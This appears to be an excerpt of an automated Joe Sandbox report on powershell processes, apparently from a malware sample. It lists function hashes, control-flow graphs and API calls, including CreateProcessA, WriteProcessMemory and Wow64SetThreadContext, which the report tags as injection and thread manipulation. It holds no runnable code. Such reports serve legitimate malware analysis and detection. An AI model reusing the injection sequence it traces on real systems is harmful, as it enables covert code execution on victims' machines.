                                                                                                  • Source File: 00000005.00000002.2681862017.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9b890000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 29c1fbfbd3870792fc50f22b13b61d2255ab7fe58d20f0a78fac0d68f26e1fb2
                                                                                                  • Instruction ID: 1e107ca6f0786a0352f9e7f0203016f4e35c531307f288512d221fbce505bc73
                                                                                                  • Opcode Fuzzy Hash: 29c1fbfbd3870792fc50f22b13b61d2255ab7fe58d20f0a78fac0d68f26e1fb2
                                                                                                  • Instruction Fuzzy Hash: 0AF0C87590DA8D8FDF559F6898295A47FE0EF29305F0500ABE449C71A2E63099548782
                                                                                                  Function 00007FFD9B899828 Relevance: .1, Instructions: 145COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2681862017.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9b890000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 094dbac96b1e75ccb695e8c373b5257f747c0c5929ea0b635b77d7742845e180
                                                                                                  • Instruction ID: 17cc86ebbb96fca7c28cae0125e86cd5fdbfcbe2256f761dd03a3d24e78c1447
                                                                                                  • Opcode Fuzzy Hash: 094dbac96b1e75ccb695e8c373b5257f747c0c5929ea0b635b77d7742845e180
                                                                                                  • Instruction Fuzzy Hash: C4412771A0DB884FDF189B5C984A6A87BE0FB98710F04416FE45993296DA30A945CBC2
                                                                                                  Function 00007FFD9B77F364 Relevance: .1, Instructions: 124COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2668904370.00007FFD9B77D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B77D000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9b77d000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: e2e2f928262eafa513ee9795d502ca2312465c05a8861d30d52e8b158535a156
                                                                                                  • Instruction ID: 66ef636d7ae395521dbdb079907a03881c1428bae0d4839edd9e2bc3f797cf47
                                                                                                  • Opcode Fuzzy Hash: e2e2f928262eafa513ee9795d502ca2312465c05a8861d30d52e8b158535a156
                                                                                                  • Instruction Fuzzy Hash: 6641277150EBC45FE7568B2998919523FF0EF57320B1606DFD088CF1B3D625A846C7A2
                                                                                                  Function 00007FFD9B89A471 Relevance: .1, Instructions: 100COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2681862017.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9b890000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 444bff1d25f88f526b76a3ac6a3f1f2a5b076815c591a45c7c45d9beac069aa3
                                                                                                  • Instruction ID: 4e99e33cf79b92b95c2e8ce3c381eda6cb5e8c1140b8e0ec041c87dc239990d2
                                                                                                  • Opcode Fuzzy Hash: 444bff1d25f88f526b76a3ac6a3f1f2a5b076815c591a45c7c45d9beac069aa3
                                                                                                  • Instruction Fuzzy Hash: 7C31F67190D78C8FCB59DF98984A7E93FB0EF96321F0441AFC448C7162D6349406CB51
                                                                                                  Function 00007FFD9B8933B5 Relevance: .0, Instructions: 49COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2681862017.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9b890000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                  • Instruction ID: 790f53b18bf535405e1566ca4fc67868e3ace26fd97990e01e1bad52e7daa871
                                                                                                  • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                  • Instruction Fuzzy Hash: 7401A73020CB0C4FDB48EF0CE451AA6B7E0FB89320F10056DE58AC36A1DA32E882CB41
                                                                                                  Function 00007FFD9B96414D Relevance: .0, Instructions: 37COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2693957824.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9b960000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 667e53840bc6006651548847d5f869c4f3d35302faa614a9e73e0bac1f52d2b7
                                                                                                  • Instruction ID: c297cddfe8300a23b839d7a230902c44945516e16ea64f730b0085a117e88b54
                                                                                                  • Opcode Fuzzy Hash: 667e53840bc6006651548847d5f869c4f3d35302faa614a9e73e0bac1f52d2b7
                                                                                                  • Instruction Fuzzy Hash: C3F0E232B0E5098FD768EB9CE4519E873E0EF6532071640BAE06DC72B3CA25EC40C741
                                                                                                  Function 00007FFD9B964400 Relevance: .0, Instructions: 35COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2693957824.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9b960000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 0abb4fd061e5dddc8e969bbd039bb774b3336677c58528ea72b5afaae3fb6813
                                                                                                  • Instruction ID: 6eebc4173183216b3336e468aa0a36fe44f9a3a4923b2bdd8867e9048887debc
                                                                                                  • Opcode Fuzzy Hash: 0abb4fd061e5dddc8e969bbd039bb774b3336677c58528ea72b5afaae3fb6813
                                                                                                  • Instruction Fuzzy Hash: 0EF0BE32B0E5498FD765EB9CE0619A873E0EF0532070600BAE05DCB1B3CA26EC40C740
                                                                                                  Function 00007FFD9B9641D1 Relevance: .0, Instructions: 29COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2693957824.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9b960000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                                  • Instruction ID: c307260e9cdd7784a7691b08768f083a0fcbbbef75ed33e7c580895a31fc6b9b
                                                                                                  • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                                  • Instruction Fuzzy Hash: ADE01A31B1C808DFDA78DA8CE051AE973E1EBA832171241BBD14EC7671CA22ED518B80
                                                                                                  Function 00007FFD9B8978CD Relevance: .0, Instructions: 20COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2681862017.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9b890000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: d6b15f2619d3c4adc761ca901a85c6c941ab18b6c234242e0ba11ee718e9bcb2
                                                                                                  • Instruction ID: b1a53206ed5cec7eb3629d21471f71df27f01b75b30fab90eed779cf7b7c3a0d
                                                                                                  • Opcode Fuzzy Hash: d6b15f2619d3c4adc761ca901a85c6c941ab18b6c234242e0ba11ee718e9bcb2
                                                                                                  • Instruction Fuzzy Hash: 2CE07D2030E6860FC311825C90507BD7E80AF89300F40043DF0DE833D7C64C55414312

                                                                                                  Non-executed Functions

                                                                                                  Function 00007FFD9B898BFA Relevance: 7.6, Strings: 6, Instructions: 93COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2681862017.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9b890000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: M_^=$M_^@$M_^T$M_^U$M_^W$M_^Y
                                                                                                  • API String ID: 0-134851635
                                                                                                  • Opcode ID: 12fcc4fe4b38b5440d1f6ed785e87e75b7a08f6c1747389d58b8ef2981f22709
                                                                                                  • Instruction ID: bfefcb82d6efc08166ea6a51294a2a5ba2bcff1f56c9a4cfe65288ae78aacc0f
                                                                                                  • Opcode Fuzzy Hash: 12fcc4fe4b38b5440d1f6ed785e87e75b7a08f6c1747389d58b8ef2981f22709
                                                                                                  • Instruction Fuzzy Hash: 4D2165B3714529DAD70A36ADBC199E83780EF9137638603F3D265CB183FC58A48799C0
                                                                                                  Function 00007FFD9B8985FA Relevance: 6.4, Strings: 5, Instructions: 127COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2681862017.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9b890000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: M_^$M_^$M_^$M_^$M_^
                                                                                                  • API String ID: 0-2396788759
                                                                                                  • Opcode ID: 78d1e0fccef8ee95f71954816316ff845b2e5532e01b7387abe109f129e5779b
                                                                                                  • Instruction ID: 5061e48d3c9b9e3d9dc897d2a5ab92720f442e91eb9d1f28326c0384f4a30dcb
                                                                                                  • Opcode Fuzzy Hash: 78d1e0fccef8ee95f71954816316ff845b2e5532e01b7387abe109f129e5779b
                                                                                                  • Instruction Fuzzy Hash: A431B293E0FAE75BEA230779887D4D93F90EF2679470A06F6C4EA4B093BD0475074241
                                                                                                  Function 00007FFD9B8986D3 Relevance: 5.2, Strings: 4, Instructions: 151COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2681862017.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9b890000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: M_^$M_^$M_^$M_^
                                                                                                  • API String ID: 0-1397233021
                                                                                                  • Opcode ID: 289114810f1e4022ea41dc9e80480b98549edb5f8318ebe741bbc76379e7e413
                                                                                                  • Instruction ID: f833a8acfd968a998f02fcfb689f569617c34a722b9730c3ed00ef44eb3a80e0
                                                                                                  • Opcode Fuzzy Hash: 289114810f1e4022ea41dc9e80480b98549edb5f8318ebe741bbc76379e7e413
                                                                                                  • Instruction Fuzzy Hash: 5841A553A0F7CA6FEB6747795C790943FE0EF16A9470A02F7C4E48B0A3ED0469478242
                                                                                                  Function 00007FFD9B89851B Relevance: 5.1, Strings: 4, Instructions: 61COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2681862017.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9b890000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: M_^$M_^$M_^$M_^
                                                                                                  • API String ID: 0-1397233021
                                                                                                  • Opcode ID: 5ef065a1410b0c19444c7b3abac5a3ebc159563e754cb02864a02f0759cecc2f
                                                                                                  • Instruction ID: e4fe3e553c880f9ad68dba647073d26f357e15c67a89e1edf001fa47e5098f62
                                                                                                  • Opcode Fuzzy Hash: 5ef065a1410b0c19444c7b3abac5a3ebc159563e754cb02864a02f0759cecc2f
                                                                                                  • Instruction Fuzzy Hash: 7711C693F0F9D75BEA6307AE48790993F90FF5679471B02F2C0E9860B3BD15A9074211

                                                                                                  Executed Functions

                                                                                                  Function 00007FFD9B8833B5 Relevance: .0, Instructions: 49COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2038351727.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_7ffd9b880000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                  • Instruction ID: 7942ddcb7b366def54c675fdc0a42c1b9c7b229ae68d60287c1eb1a1f3edd8da
                                                                                                  • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                  • Instruction Fuzzy Hash: 9001A73020CB0C4FD748EF0CE451AA6B3E0FB89320F10056DE58AC36A1DA32E882CB41

                                                                                                  Executed Functions

                                                                                                  Function 00007FFD9B8933B5 Relevance: .0, Instructions: 49COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2154634408.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_7ffd9b890000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 6b7eb879aeff2565d6fe36d34af01aa9e22e2b06d64cdbf2127ecae66d78e1e9
                                                                                                  • Instruction ID: 790f53b18bf535405e1566ca4fc67868e3ace26fd97990e01e1bad52e7daa871
                                                                                                  • Opcode Fuzzy Hash: 6b7eb879aeff2565d6fe36d34af01aa9e22e2b06d64cdbf2127ecae66d78e1e9
                                                                                                  • Instruction Fuzzy Hash: 7401A73020CB0C4FDB48EF0CE451AA6B7E0FB89320F10056DE58AC36A1DA32E882CB41

                                                                                                  Execution Graph

                                                                                                  Execution Coverage:4.9%
                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                  Signature Coverage:0%
                                                                                                  Total number of Nodes:12
                                                                                                  Total number of Limit Nodes:0

                                                                                                  Executed Functions

                                                                                                  Function 00007FFD9B970E8D Relevance: 2.4, Strings: 1, Instructions: 1120COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 0 7ffd9b970e8d-7ffd9b970ecc 2 7ffd9b970ece-7ffd9b970edb 0->2 3 7ffd9b970edc-7ffd9b970f19 0->3 2->3 6 7ffd9b970f1f-7ffd9b970f29 3->6 7 7ffd9b9710ad-7ffd9b971109 3->7 8 7ffd9b970f42-7ffd9b970f47 6->8 9 7ffd9b970f2b-7ffd9b970f40 6->9 33 7ffd9b971134-7ffd9b97115f 7->33 34 7ffd9b97110b-7ffd9b971132 7->34 12 7ffd9b970f4d-7ffd9b970f50 8->12 13 7ffd9b97104a-7ffd9b971054 8->13 9->8 15 7ffd9b970f52-7ffd9b970f65 12->15 16 7ffd9b970f99 12->16 17 7ffd9b971065-7ffd9b9710aa 13->17 18 7ffd9b971056-7ffd9b971064 13->18 15->7 29 7ffd9b970f6b-7ffd9b970f75 15->29 19 7ffd9b970f9b-7ffd9b970f9d 16->19 17->7 19->13 23 7ffd9b970fa3-7ffd9b970fa6 19->23 26 7ffd9b970fbd-7ffd9b970fc1 23->26 27 7ffd9b970fa8-7ffd9b970fb1 23->27 26->13 38 7ffd9b970fc7-7ffd9b970fcd 26->38 27->26 35 7ffd9b970f8e-7ffd9b970f97 29->35 36 7ffd9b970f77-7ffd9b970f84 29->36 54 7ffd9b971161 33->54 55 7ffd9b971166-7ffd9b971177 33->55 34->33 35->19 36->35 44 7ffd9b970f86-7ffd9b970f8c 36->44 41 7ffd9b970fcf-7ffd9b970fdc 38->41 42 7ffd9b970fe9-7ffd9b970fef 38->42 41->42 49 7ffd9b970fde-7ffd9b970fe7 41->49 46 7ffd9b970ff1-7ffd9b971009 42->46 47 7ffd9b97100b-7ffd9b971021 42->47 44->35 46->47 56 7ffd9b971023-7ffd9b971033 47->56 57 7ffd9b97103a-7ffd9b971049 47->57 49->42 54->55 58 7ffd9b971163 54->58 59 7ffd9b97117e-7ffd9b9711ac 55->59 60 7ffd9b971179 55->60 58->55 65 7ffd9b9711ae-7ffd9b9711b7 59->65 66 7ffd9b9711bc-7ffd9b971219 59->66 60->59 64 7ffd9b97117b 60->64 64->59 65->66 68 7ffd9b97121f-7ffd9b971229 66->68 69 7ffd9b9713aa-7ffd9b971406 66->69 70 7ffd9b971242-7ffd9b971247 68->70 71 7ffd9b97122b-7ffd9b971240 68->71 95 7ffd9b971431-7ffd9b97145b 69->95 96 7ffd9b971408-7ffd9b97142f 69->96 73 7ffd9b97124d-7ffd9b971250 70->73 74 7ffd9b971347-7ffd9b971351 70->74 71->70 77 7ffd9b971252-7ffd9b971265 73->77 78 7ffd9b971299 73->78 79 7ffd9b971353-7ffd9b971361 74->79 80 7ffd9b971362-7ffd9b9713a7 74->80 77->69 91 7ffd9b97126b-7ffd9b971275 77->91 84 7ffd9b97129b-7ffd9b97129d 78->84 80->69 84->74 87 7ffd9b9712a3-7ffd9b9712a6 84->87 88 7ffd9b9712bd-7ffd9b9712c1 87->88 89 7ffd9b9712a8-7ffd9b9712b1 87->89 88->74 99 7ffd9b9712c7-7ffd9b9712cd 88->99 89->88 97 7ffd9b97128e-7ffd9b971297 91->97 98 7ffd9b971277-7ffd9b971284 91->98 116 7ffd9b971462-7ffd9b971468 95->116 117 7ffd9b97145d 95->117 96->95 97->84 98->97 105 7ffd9b971286-7ffd9b97128c 98->105 102 7ffd9b9712cf-7ffd9b9712dc 99->102 103 7ffd9b9712e9-7ffd9b9712ef 99->103 102->103 110 7ffd9b9712de-7ffd9b9712e7 102->110 108 7ffd9b9712f1-7ffd9b971309 103->108 109 7ffd9b97130b-7ffd9b97131e 103->109 105->97 108->109 119 7ffd9b971320-7ffd9b971335 109->119 120 7ffd9b971337-7ffd9b971346 109->120 110->103 121 7ffd9b971469-7ffd9b971473 116->121 117->116 118 7ffd9b97145f 117->118 118->116 119->120 125 7ffd9b97147a-7ffd9b971490 121->125 126 7ffd9b971475 121->126 125->121 129 7ffd9b971492-7ffd9b9714a4 125->129 126->125 127 7ffd9b971477 126->127 127->125 130 7ffd9b9714b7-7ffd9b97150f 129->130 131 7ffd9b9714a6-7ffd9b9714b5 129->131 134 7ffd9b97169f-7ffd9b9716fd 130->134 135 7ffd9b971515-7ffd9b97151f 130->135 131->130 160 7ffd9b9716ff-7ffd9b971726 134->160 161 7ffd9b971728-7ffd9b97174d 134->161 136 7ffd9b971521-7ffd9b97152f 135->136 137 7ffd9b971539-7ffd9b97153f 135->137 136->137 142 7ffd9b971531-7ffd9b971537 136->142 138 7ffd9b971634-7ffd9b97163e 137->138 139 7ffd9b971545-7ffd9b971548 137->139 143 7ffd9b971651-7ffd9b97169c 138->143 144 7ffd9b971640-7ffd9b971650 138->144 145 7ffd9b971591 139->145 146 7ffd9b97154a-7ffd9b97155d 139->146 142->137 143->134 149 7ffd9b971593-7ffd9b971595 145->149 146->134 156 7ffd9b971563-7ffd9b97156d 146->156 149->138 153 7ffd9b97159b-7ffd9b97159e 149->153 153->138 157 7ffd9b9715a4-7ffd9b9715a7 153->157 162 7ffd9b97156f-7ffd9b971584 156->162 163 7ffd9b971586-7ffd9b97158f 156->163 157->138 159 7ffd9b9715ad-7ffd9b9715e1 157->159 159->138 179 7ffd9b9715e3-7ffd9b9715e9 159->179 160->161 174 7ffd9b97174f-7ffd9b971755 161->174 175 7ffd9b971759-7ffd9b971765 161->175 162->163 163->149 174->175 176 7ffd9b971771-7ffd9b971789 175->176 177 7ffd9b971767-7ffd9b97176d 175->177 177->176 180 7ffd9b9715eb-7ffd9b971606 179->180 181 7ffd9b971608-7ffd9b97161e 179->181 180->181 183 7ffd9b971624-7ffd9b971633 181->183
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.2633720709.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_7ffd9b970000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: K_H
                                                                                                  • API String ID: 0-3938840025
                                                                                                  • Opcode ID: fd79d0cd2aa3597b3eef1854d6afbd5d6be39aa27bbc329916bbe026b11a4f2c
                                                                                                  • Instruction ID: aa47d502348c7c8d803023cde55dd325caac6ffb31b71e9179de0b723f3f458f
                                                                                                  • Opcode Fuzzy Hash: fd79d0cd2aa3597b3eef1854d6afbd5d6be39aa27bbc329916bbe026b11a4f2c
                                                                                                  • Instruction Fuzzy Hash: DF625A31B1EB8D1FE7AA876858A55B47BD1EF56324B0A01FFD04DC71A3DE18AD068381
                                                                                                  Function 00007FFD9B8AA084 Relevance: 1.9, APIs: 1, Instructions: 436processCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 185 7ffd9b8aa084-7ffd9b8aa08b 186 7ffd9b8aa096-7ffd9b8aa164 185->186 187 7ffd9b8aa08d-7ffd9b8aa095 185->187 191 7ffd9b8aa166-7ffd9b8aa175 186->191 192 7ffd9b8aa1c2-7ffd9b8aa1f4 186->192 187->186 191->192 193 7ffd9b8aa177-7ffd9b8aa17a 191->193 197 7ffd9b8aa1f6-7ffd9b8aa205 192->197 198 7ffd9b8aa252-7ffd9b8aa2c6 192->198 195 7ffd9b8aa17c-7ffd9b8aa18f 193->195 196 7ffd9b8aa1b4-7ffd9b8aa1bc 193->196 199 7ffd9b8aa193-7ffd9b8aa1a6 195->199 200 7ffd9b8aa191 195->200 196->192 197->198 201 7ffd9b8aa207-7ffd9b8aa20a 197->201 208 7ffd9b8aa2c8-7ffd9b8aa2d7 198->208 209 7ffd9b8aa324-7ffd9b8aa42d CreateProcessA 198->209 199->199 202 7ffd9b8aa1a8-7ffd9b8aa1b0 199->202 200->199 203 7ffd9b8aa20c-7ffd9b8aa21f 201->203 204 7ffd9b8aa244-7ffd9b8aa24c 201->204 202->196 206 7ffd9b8aa223-7ffd9b8aa236 203->206 207 7ffd9b8aa221 203->207 204->198 206->206 210 7ffd9b8aa238-7ffd9b8aa240 206->210 207->206 208->209 211 7ffd9b8aa2d9-7ffd9b8aa2dc 208->211 220 7ffd9b8aa435-7ffd9b8aa4c6 call 7ffd9b8aa4e2 209->220 221 7ffd9b8aa42f 209->221 210->204 213 7ffd9b8aa316-7ffd9b8aa31e 211->213 214 7ffd9b8aa2de-7ffd9b8aa2f1 211->214 213->209 216 7ffd9b8aa2f5-7ffd9b8aa308 214->216 217 7ffd9b8aa2f3 214->217 216->216 218 7ffd9b8aa30a-7ffd9b8aa312 216->218 217->216 218->213 230 7ffd9b8aa4c8 220->230 231 7ffd9b8aa4cd-7ffd9b8aa4e1 220->231 221->220 230->231
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.2622859939.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_7ffd9b8a0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateProcess
                                                                                                  • String ID:
                                                                                                  • API String ID: 963392458-0
                                                                                                  • Opcode ID: d1a41e9516184ab5f8dd7de960e7a22beed805ff51fb3586db27a113d823bb61
                                                                                                  • Instruction ID: 3870a167e2829ab0307fc41ffe04e0939f008618613dc3c83c6696b4a622782e
                                                                                                  • Opcode Fuzzy Hash: d1a41e9516184ab5f8dd7de960e7a22beed805ff51fb3586db27a113d823bb61
                                                                                                  • Instruction Fuzzy Hash: 03D1A530A18E8D8FDB78DF18DC567E977D1FB59310F10422AE84EC7291DE74AA418B92
                                                                                                  Function 00007FFD9B8A9D24 Relevance: 1.7, APIs: 1, Instructions: 151injectionCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 232 7ffd9b8a9d24-7ffd9b8a9d2b 233 7ffd9b8a9d36-7ffd9b8a9dc5 232->233 234 7ffd9b8a9d2d-7ffd9b8a9d35 232->234 238 7ffd9b8a9dc7-7ffd9b8a9dcc 233->238 239 7ffd9b8a9dcf-7ffd9b8a9e24 WriteProcessMemory 233->239 234->233 238->239 241 7ffd9b8a9e26 239->241 242 7ffd9b8a9e2c-7ffd9b8a9e5d 239->242 241->242
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.2622859939.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_7ffd9b8a0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MemoryProcessWrite
                                                                                                  • String ID:
                                                                                                  • API String ID: 3559483778-0
                                                                                                  • Opcode ID: cd4184bca02da2cea938e4f8afb91cebc65e4ba7d6cfe9fc54b9fa1a6e509e7f
                                                                                                  • Instruction ID: 6bc68ca129e703301648b4b5c9c34d882029d5118b00636bdddc434f5d8a1661
                                                                                                  • Opcode Fuzzy Hash: cd4184bca02da2cea938e4f8afb91cebc65e4ba7d6cfe9fc54b9fa1a6e509e7f
                                                                                                  • Instruction Fuzzy Hash: F541E631D0CB5C4FDB289F98A8466F97BE0EB99320F00426FE449D3292DE74A846C7D1
                                                                                                  Function 00007FFD9B8A9B18 Relevance: 1.6, APIs: 1, Instructions: 130threadCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 244 7ffd9b8a9b18-7ffd9b8a9b1f 245 7ffd9b8a9b2a-7ffd9b8a9b9d 244->245 246 7ffd9b8a9b21-7ffd9b8a9b29 244->246 250 7ffd9b8a9ba7-7ffd9b8a9be2 Wow64SetThreadContext 245->250 251 7ffd9b8a9b9f-7ffd9b8a9ba4 245->251 246->245 253 7ffd9b8a9bea-7ffd9b8a9c19 250->253 254 7ffd9b8a9be4 250->254 251->250 254->253
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.2622859939.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_7ffd9b8a0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ContextThreadWow64
                                                                                                  • String ID:
                                                                                                  • API String ID: 983334009-0
                                                                                                  • Opcode ID: 30671b5d8d174b7ce5a2b9abf73caf659ac80bbef1e42b3dc128c680dc140d36
                                                                                                  • Instruction ID: b037e46e09a113cb3a831d859854a1e91a4f61dcdf065f92c0fcfad9ac4f3479
                                                                                                  • Opcode Fuzzy Hash: 30671b5d8d174b7ce5a2b9abf73caf659ac80bbef1e42b3dc128c680dc140d36
                                                                                                  • Instruction Fuzzy Hash: 6E312631D0CB184FDB289BA8A84A6FA7BE1EF55321F04427FD04AD32D2DF74A4068791
                                                                                                  Function 00007FFD9B8A9A1D Relevance: 1.6, APIs: 1, Instructions: 119threadCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
